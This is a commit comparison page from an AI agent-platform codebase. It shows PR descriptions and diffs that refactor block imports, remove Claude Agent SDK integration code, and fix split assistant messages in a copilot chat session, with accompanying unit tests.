Compare commits

..

6 Commits

Author SHA1 Message Date
Lluis Agusti
5348d97437 Merge remote-tracking branch 'origin/dev' into fix/copilot-progress-bar 2026-02-12 20:38:20 +08:00
Reinier van der Leer
113e87a23c refactor(backend): Reduce circular imports (#12068)
I'm getting circular import issues because there is a lot of
cross-importing between `backend.data`, `backend.blocks`, and other
modules. This change reduces block-related cross-imports and thus risk
of breaking circular imports.

### Changes 🏗️

- Strip down `backend.data.block`
- Move `Block` base class and related class/enum defs to
`backend.blocks._base`
  - Move `is_block_auth_configured` to `backend.blocks._utils`
- Move `get_blocks()`, `get_io_block_ids()` etc. to `backend.blocks`
(`__init__.py`)
  - Update imports everywhere
- Remove unused and poorly typed `Block.create()`
  - Change usages from `block_cls.create()` to `block_cls()`
- Improve typing of `load_all_blocks` and `get_blocks`
- Move cross-import of `backend.api.features.library.model` from
`backend/data/__init__.py` to `backend/data/integrations.py`
- Remove deprecated attribute `NodeModel.webhook`
  - Re-generate OpenAPI spec and fix frontend usage
- Eliminate module-level `backend.blocks` import from `blocks/agent.py`
- Eliminate module-level `backend.data.execution` and
`backend.executor.manager` imports from `blocks/helpers/review.py`
- Replace `BlockInput` with `GraphInput` for graph inputs

### Checklist 📋

#### For code changes:
- [x] I have clearly listed my changes in the PR description
- [x] I have made a test plan
- [x] I have tested my changes according to the test plan:
  - CI static type-checking + tests should be sufficient for this
2026-02-12 12:07:49 +00:00
Abhimanyu Yadav
d09f1532a4 feat(frontend): replace legacy builder with new flow editor
(#12081)

### Changes 🏗️

This PR completes the migration from the legacy builder to the new Flow
editor by removing all legacy code and feature flags.

**Removed:**
- Old builder view toggle functionality (`BuilderViewTabs.tsx`)
- Legacy debug panel (`RightSidebar.tsx`)
- Feature flags: `NEW_FLOW_EDITOR` and `BUILDER_VIEW_SWITCH`
- `useBuilderView` hook and related view-switching logic

**Updated:**
- Simplified `build/page.tsx` to always render the new Flow editor
- Added CSS styling (`flow.css`) to properly render Phosphor icons in
React Flow handles

**Tests:**
- Skipped e2e test suite in `build.spec.ts` (legacy builder tests)
- Follow-up PR (#12082) will add new e2e tests for the Flow editor

### Checklist 📋

#### For code changes:

- [x] I have clearly listed my changes in the PR description
- [x] I have made a test plan
- [x] I have tested my changes according to the test plan:
    - [x] Create a new flow and verify it loads correctly
    - [x] Add nodes and connections to verify basic functionality works
    - [x] Verify that node handles render correctly with the new CSS
- [x] Check that the UI is clean without the old debug panel or view
toggles

#### For configuration changes:

- [x] `.env.default` is updated or already compatible with my changes
- [x] `docker-compose.yml` is updated or already compatible with my
changes
2026-02-12 11:16:01 +00:00
Zamil Majdy
a78145505b fix(copilot): merge split assistant messages to prevent Anthropic API errors (#12062)
## Summary
- When the copilot model responds with both text content AND a
long-running tool call (e.g., `create_agent`), the streaming code
created two separate consecutive assistant messages — one with text, one
with `tool_calls`. This caused Anthropic's API to reject with
`"unexpected tool_use_id found in tool_result blocks"` because the
`tool_result` couldn't find a matching `tool_use` in the immediately
preceding assistant message.
- Added a defensive merge of consecutive assistant messages in
`to_openai_messages()` (fixes existing corrupt sessions too)
- Fixed `_yield_tool_call` to add tool_calls to the existing
current-turn assistant message instead of creating a new one
- Changed `accumulated_tool_calls` assignment to use `extend` to prevent
overwriting tool_calls added by long-running tool flow

## Test plan
- [x] All 23 chat feature tests pass (`backend/api/features/chat/`)
- [x] All 44 prompt utility tests pass (`backend/util/prompt_test.py`)
- [x] All pre-commit hooks pass (ruff, isort, black, pyright)
- [ ] Manual test: create an agent via copilot, then ask a follow-up
question — should no longer get 400 error

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

Fixes a critical bug where long-running tool calls (like `create_agent`)
caused Anthropic API 400 errors due to split assistant messages. The fix
ensures tool calls are added to the existing assistant message instead
of creating new ones, and adds a defensive merge function to repair any
existing corrupt sessions.

**Key changes:**
- Added `_merge_consecutive_assistant_messages()` to defensively merge
split assistant messages in `to_openai_messages()`
- Modified `_yield_tool_call()` to append tool calls to the current-turn
assistant message instead of creating a new one
- Changed `accumulated_tool_calls` from assignment to `extend` to
preserve tool calls already added by long-running tool flow

**Impact:** Resolves the issue where users received 400 errors after
creating agents via copilot and asking follow-up questions.
</details>


<details><summary><h3>Confidence Score: 4/5</h3></summary>

- Safe to merge with minor verification recommended
- The changes are well-targeted and solve a real API compatibility
issue. The logic is sound: searching backwards for the current assistant
message is correct, and using `extend` instead of assignment prevents
overwriting. The defensive merge in `to_openai_messages()` also fixes
existing corrupt sessions. All existing tests pass according to the PR
description.
- No files require special attention - changes are localized and
defensive
</details>


<details><summary><h3>Sequence Diagram</h3></summary>

```mermaid
sequenceDiagram
    participant User
    participant StreamAPI as stream_chat_completion
    participant Chunks as _stream_chat_chunks
    participant ToolCall as _yield_tool_call
    participant Session as ChatSession
    
    User->>StreamAPI: Send message
    StreamAPI->>Chunks: Stream chat chunks
    
    alt Text + Long-running tool call
        Chunks->>StreamAPI: Text delta (content)
        StreamAPI->>Session: Append assistant message with content
        Chunks->>ToolCall: Tool call detected
        
        Note over ToolCall: OLD: Created new assistant message<br/>NEW: Appends to existing assistant
        
        ToolCall->>Session: Search backwards for current assistant
        ToolCall->>Session: Append tool_call to existing message
        ToolCall->>Session: Add pending tool result
    end
    
    StreamAPI->>StreamAPI: Merge accumulated_tool_calls
    Note over StreamAPI: Use extend (not assign)<br/>to preserve existing tool_calls
    
    StreamAPI->>Session: to_openai_messages()
    Session->>Session: _merge_consecutive_assistant_messages()
    Note over Session: Defensive: Merges any split<br/>assistant messages
    Session-->>StreamAPI: Merged messages
    
    StreamAPI->>User: Return response
```
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->
2026-02-12 01:52:17 +00:00
Lluis Agusti
6573d987ea fix(frontend): minor copilot UI fixes 2026-02-10 22:44:29 +08:00
Lluis Agusti
ae8ce8b4ca fix(frontend): copilot progress bar full width 2026-02-10 22:19:18 +08:00
208 changed files with 1856 additions and 5035 deletions

View File

@@ -62,16 +62,12 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
RUN apt-get update && apt-get install -y \
python3.13 \
python3-pip \
ffmpeg \
imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder

View File

@@ -10,7 +10,7 @@ from typing_extensions import TypedDict
import backend.api.features.store.cache as store_cache
import backend.api.features.store.model as store_model
import backend.data.block
import backend.blocks
from backend.api.external.middleware import require_permission
from backend.data import execution as execution_db
from backend.data import graph as graph_db
@@ -67,7 +67,7 @@ async def get_user_info(
dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
)
async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
blocks = [block() for block in backend.data.block.get_blocks().values()]
blocks = [block() for block in backend.blocks.get_blocks().values()]
return [b.to_dict() for b in blocks if not b.disabled]
@@ -83,7 +83,7 @@ async def execute_graph_block(
require_permission(APIKeyPermission.EXECUTE_BLOCK)
),
) -> CompletedBlockOutput:
obj = backend.data.block.get_block(block_id)
obj = backend.blocks.get_block(block_id)
if not obj:
raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
if obj.disabled:

View File

@@ -10,10 +10,15 @@ import backend.api.features.library.db as library_db
import backend.api.features.library.model as library_model
import backend.api.features.store.db as store_db
import backend.api.features.store.model as store_model
import backend.data.block
from backend.blocks import load_all_blocks
from backend.blocks._base import (
AnyBlockSchema,
BlockCategory,
BlockInfo,
BlockSchema,
BlockType,
)
from backend.blocks.llm import LlmModel
from backend.data.block import AnyBlockSchema, BlockCategory, BlockInfo, BlockSchema
from backend.data.db import query_raw_with_schema
from backend.integrations.providers import ProviderName
from backend.util.cache import cached
@@ -22,7 +27,7 @@ from backend.util.models import Pagination
from .model import (
BlockCategoryResponse,
BlockResponse,
BlockType,
BlockTypeFilter,
CountResponse,
FilterType,
Provider,
@@ -88,7 +93,7 @@ def get_block_categories(category_blocks: int = 3) -> list[BlockCategoryResponse
def get_blocks(
*,
category: str | None = None,
type: BlockType | None = None,
type: BlockTypeFilter | None = None,
provider: ProviderName | None = None,
page: int = 1,
page_size: int = 50,
@@ -669,9 +674,9 @@ async def get_suggested_blocks(count: int = 5) -> list[BlockInfo]:
for block_type in load_all_blocks().values():
block: AnyBlockSchema = block_type()
if block.disabled or block.block_type in (
backend.data.block.BlockType.INPUT,
backend.data.block.BlockType.OUTPUT,
backend.data.block.BlockType.AGENT,
BlockType.INPUT,
BlockType.OUTPUT,
BlockType.AGENT,
):
continue
# Find the execution count for this block

View File

@@ -4,7 +4,7 @@ from pydantic import BaseModel
import backend.api.features.library.model as library_model
import backend.api.features.store.model as store_model
from backend.data.block import BlockInfo
from backend.blocks._base import BlockInfo
from backend.integrations.providers import ProviderName
from backend.util.models import Pagination
@@ -15,7 +15,7 @@ FilterType = Literal[
"my_agents",
]
BlockType = Literal["all", "input", "action", "output"]
BlockTypeFilter = Literal["all", "input", "action", "output"]
class SearchEntry(BaseModel):

View File

@@ -88,7 +88,7 @@ async def get_block_categories(
)
async def get_blocks(
category: Annotated[str | None, fastapi.Query()] = None,
type: Annotated[builder_model.BlockType | None, fastapi.Query()] = None,
type: Annotated[builder_model.BlockTypeFilter | None, fastapi.Query()] = None,
provider: Annotated[ProviderName | None, fastapi.Query()] = None,
page: Annotated[int, fastapi.Query()] = 1,
page_size: Annotated[int, fastapi.Query()] = 50,

View File

@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
max_context_messages: int = Field(
default=50, ge=1, le=200, description="Maximum context messages"
)
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules"
@@ -92,27 +93,6 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch",
)
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
claude_agent_model: str | None = Field(
default=None,
description="Model for the Claude Agent SDK path. If None, derives from "
"the `model` field by stripping the OpenRouter provider prefix.",
)
claude_agent_max_budget_usd: float | None = Field(
default=None,
gt=0,
description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
)
claude_agent_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models
thinking_enabled: bool = Field(
default=True,
@@ -158,17 +138,6 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY")
return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md",

View File

@@ -2,7 +2,7 @@ import asyncio
import logging
import uuid
from datetime import UTC, datetime
from typing import Any
from typing import Any, cast
from weakref import WeakValueDictionary
from openai.types.chat import (
@@ -104,6 +104,26 @@ class ChatSession(BaseModel):
successful_agent_runs: dict[str, int] = {}
successful_agent_schedules: dict[str, int] = {}
def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
"""Attach a tool_call to the current turn's assistant message.
Searches backwards for the most recent assistant message (stopping at
any user message boundary). If found, appends the tool_call to it.
Otherwise creates a new assistant message with the tool_call.
"""
for msg in reversed(self.messages):
if msg.role == "user":
break
if msg.role == "assistant":
if not msg.tool_calls:
msg.tool_calls = []
msg.tool_calls.append(tool_call)
return
self.messages.append(
ChatMessage(role="assistant", content="", tool_calls=[tool_call])
)
@staticmethod
def new(user_id: str) -> "ChatSession":
return ChatSession(
@@ -172,6 +192,47 @@ class ChatSession(BaseModel):
successful_agent_schedules=successful_agent_schedules,
)
@staticmethod
def _merge_consecutive_assistant_messages(
messages: list[ChatCompletionMessageParam],
) -> list[ChatCompletionMessageParam]:
"""Merge consecutive assistant messages into single messages.
Long-running tool flows can create split assistant messages: one with
text content and another with tool_calls. Anthropic's API requires
tool_result blocks to reference a tool_use in the immediately preceding
assistant message, so these splits cause 400 errors via OpenRouter.
"""
if len(messages) < 2:
return messages
result: list[ChatCompletionMessageParam] = [messages[0]]
for msg in messages[1:]:
prev = result[-1]
if prev.get("role") != "assistant" or msg.get("role") != "assistant":
result.append(msg)
continue
prev = cast(ChatCompletionAssistantMessageParam, prev)
curr = cast(ChatCompletionAssistantMessageParam, msg)
curr_content = curr.get("content") or ""
if curr_content:
prev_content = prev.get("content") or ""
prev["content"] = (
f"{prev_content}\n{curr_content}" if prev_content else curr_content
)
curr_tool_calls = curr.get("tool_calls")
if curr_tool_calls:
prev_tool_calls = prev.get("tool_calls")
prev["tool_calls"] = (
list(prev_tool_calls) + list(curr_tool_calls)
if prev_tool_calls
else list(curr_tool_calls)
)
return result
def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
messages = []
for message in self.messages:
@@ -258,7 +319,7 @@ class ChatSession(BaseModel):
name=message.name or "",
)
)
return messages
return self._merge_consecutive_assistant_messages(messages)
async def _get_session_from_cache(session_id: str) -> ChatSession | None:
@@ -273,8 +334,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try:
session = ChatSession.model_validate_json(raw_session)
logger.info(
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
f"Loading session {session_id} from cache: "
f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
)
return session
except Exception as e:
@@ -316,9 +378,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None
messages = prisma_session.Messages
logger.debug(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
logger.info(
f"Loading session {session_id} from DB: "
f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
)
return ChatSession.from_db(prisma_session, messages)
@@ -369,9 +433,10 @@ async def _save_session_to_db(
"function_call": msg.function_call,
}
)
logger.debug(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
f"roles={[m['role'] for m in messages_data]}"
logger.info(
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
)
await chat_db.add_chat_messages_batch(
session_id=session.session_id,
@@ -411,7 +476,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database
logger.debug(f"Session {session_id} not in cache, checking database")
logger.info(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id)
if session is None:
@@ -428,6 +493,7 @@ async def get_chat_session(
# Cache the session from DB
try:
await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -492,40 +558,6 @@ async def upsert_chat_session(
return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it.
@@ -632,19 +664,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update")
return False
# Update title in cache if it exists (instead of invalidating).
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
# Invalidate cache so next fetch gets updated title
try:
cached = await _get_session_from_cache(session_id)
if cached:
cached.title = title
await _cache_session(cached)
redis_key = _get_session_cache_key(session_id)
async_redis = await get_redis_async()
await async_redis.delete(redis_key)
except Exception as e:
# Not critical - title will be correct on next full cache refresh
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
return True
except Exception as e:

View File

@@ -1,4 +1,16 @@
from typing import cast
import pytest
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionMessageParam,
ChatCompletionToolMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_message_tool_call_param import (
ChatCompletionMessageToolCallParam,
Function,
)
from .model import (
ChatMessage,
@@ -117,3 +129,205 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
loaded.tool_calls is not None
), f"Tool calls missing for {orig.role} message"
assert len(orig.tool_calls) == len(loaded.tool_calls)
# --------------------------------------------------------------------------- #
# _merge_consecutive_assistant_messages #
# --------------------------------------------------------------------------- #
_tc = ChatCompletionMessageToolCallParam(
id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
)
_tc2 = ChatCompletionMessageToolCallParam(
id="tc2", type="function", function=Function(name="other", arguments="{}")
)
def test_merge_noop_when_no_consecutive_assistants():
"""Messages without consecutive assistants are returned unchanged."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="hi"),
ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
ChatCompletionUserMessageParam(role="user", content="bye"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert [m["role"] for m in merged] == ["user", "assistant", "user"]
def test_merge_splits_text_and_tool_calls():
"""The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="build agent"),
ChatCompletionAssistantMessageParam(
role="assistant", content="Let me build that"
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert merged[0]["role"] == "user"
assert merged[2]["role"] == "tool"
a = cast(ChatCompletionAssistantMessageParam, merged[1])
assert a["role"] == "assistant"
assert a.get("content") == "Let me build that"
assert a.get("tool_calls") == [_tc]
def test_merge_combines_tool_calls_from_both():
"""Both consecutive assistants have tool_calls — they get merged."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(
role="assistant", content="text", tool_calls=[_tc]
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc2]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("tool_calls") == [_tc, _tc2]
assert a.get("content") == "text"
def test_merge_three_consecutive_assistants():
"""Three consecutive assistants collapse into one."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(role="assistant", content="a"),
ChatCompletionAssistantMessageParam(role="assistant", content="b"),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("content") == "a\nb"
assert a.get("tool_calls") == [_tc]
def test_merge_empty_and_single_message():
"""Edge cases: empty list and single message."""
assert ChatSession._merge_consecutive_assistant_messages([]) == []
single: list[ChatCompletionMessageParam] = [
ChatCompletionUserMessageParam(role="user", content="hi")
]
assert ChatSession._merge_consecutive_assistant_messages(single) == single
# --------------------------------------------------------------------------- #
# add_tool_call_to_current_turn #
# --------------------------------------------------------------------------- #
_raw_tc = {
"id": "tc1",
"type": "function",
"function": {"name": "f", "arguments": "{}"},
}
_raw_tc2 = {
"id": "tc2",
"type": "function",
"function": {"name": "g", "arguments": "{}"},
}
def test_add_tool_call_appends_to_existing_assistant():
"""When the last assistant is from the current turn, tool_call is added to it."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="working on it"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2 # no new message created
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_creates_assistant_when_none_exists():
"""When there's no current-turn assistant, a new one is created."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2
assert session.messages[1].role == "assistant"
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_does_not_cross_user_boundary():
"""A user message acts as a boundary — previous assistant is not modified."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="assistant", content="old turn"),
ChatMessage(role="user", content="new message"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 3 # new assistant was created
assert session.messages[0].tool_calls is None # old assistant untouched
assert session.messages[2].role == "assistant"
assert session.messages[2].tool_calls == [_raw_tc]
def test_add_tool_call_multiple_times():
"""Multiple long-running tool calls accumulate on the same assistant."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="doing stuff"),
]
session.add_tool_call_to_current_turn(_raw_tc)
# Simulate a pending tool result in between (like _yield_tool_call does)
session.messages.append(
ChatMessage(role="tool", content="pending", tool_call_id="tc1")
)
session.add_tool_call_to_current_turn(_raw_tc2)
assert len(session.messages) == 3 # user, assistant, tool — no extra assistant
assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
def test_to_openai_messages_merges_split_assistants():
"""End-to-end: session with split assistants produces valid OpenAI messages."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="build agent"),
ChatMessage(role="assistant", content="Let me build that"),
ChatMessage(
role="assistant",
content="",
tool_calls=[
{
"id": "tc1",
"type": "function",
"function": {"name": "create_agent", "arguments": "{}"},
}
],
),
ChatMessage(role="tool", content="done", tool_call_id="tc1"),
ChatMessage(role="assistant", content="Saved!"),
ChatMessage(role="user", content="show me an example run"),
]
openai_msgs = session.to_openai_messages()
# The two consecutive assistants at index 1,2 should be merged
roles = [m["role"] for m in openai_msgs]
assert roles == ["user", "assistant", "tool", "assistant", "user"]
# The merged assistant should have both content and tool_calls
merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
assert merged.get("content") == "Let me build that"
tc_list = merged.get("tool_calls")
assert tc_list is not None and len(list(tc_list)) == 1
assert list(tc_list)[0]["id"] == "tc1"

View File

@@ -1,6 +1,5 @@
"""Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging
import uuid as uuid_module
from collections.abc import AsyncGenerator
@@ -17,16 +16,8 @@ from . import service as chat_service
from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig
from .model import (
ChatMessage,
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
from .response_model import StreamFinish, StreamHeartbeat
from .tools.models import (
AgentDetailsResponse,
AgentOutputResponse,
@@ -49,7 +40,6 @@ from .tools.models import (
SetupRequirementsResponse,
UnderstandingUpdatedResponse,
)
from .tracking import track_user_message
config = ChatConfig()
@@ -241,10 +231,6 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task:
# Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE
@@ -314,9 +300,10 @@ async def stream_chat_post(
f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta},
)
session = await _validate_and_get_session(session_id, user_id)
logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -325,25 +312,6 @@ async def stream_chat_post(
},
)
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4())
@@ -359,7 +327,7 @@ async def stream_chat_post(
operation_id=operation_id,
)
logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -380,43 +348,15 @@ async def stream_chat_post(
first_chunk_time, ttfc = None, None
chunk_count = 0
try:
# Emit a start event with task_id for reconnection
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
async for chunk in chat_service.stream_chat_completion(
session_id,
None, # Message already in session
request.message,
is_user_message=request.is_user_message,
user_id=user_id,
session=session, # Pass session with message already added
session=session, # Pass pre-fetched session to avoid double-fetch
context=request.context,
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1
if first_chunk_time is None:
first_chunk_time = time_module.perf_counter()
@@ -437,7 +377,7 @@ async def stream_chat_post(
gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000
logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={
@@ -464,17 +404,6 @@ async def stream_chat_post(
}
},
)
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task
@@ -577,14 +506,8 @@ async def stream_chat_post(
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
},
)
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
finally:
# Unsubscribe when client disconnects or stream ends
# Unsubscribe when client disconnects or stream ends to prevent resource leak
if subscriber_queue is not None:
try:
await stream_registry.unsubscribe_from_task(
@@ -828,6 +751,8 @@ async def stream_task(
)
async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try:
while True:

View File

@@ -1,14 +0,0 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -1,363 +0,0 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
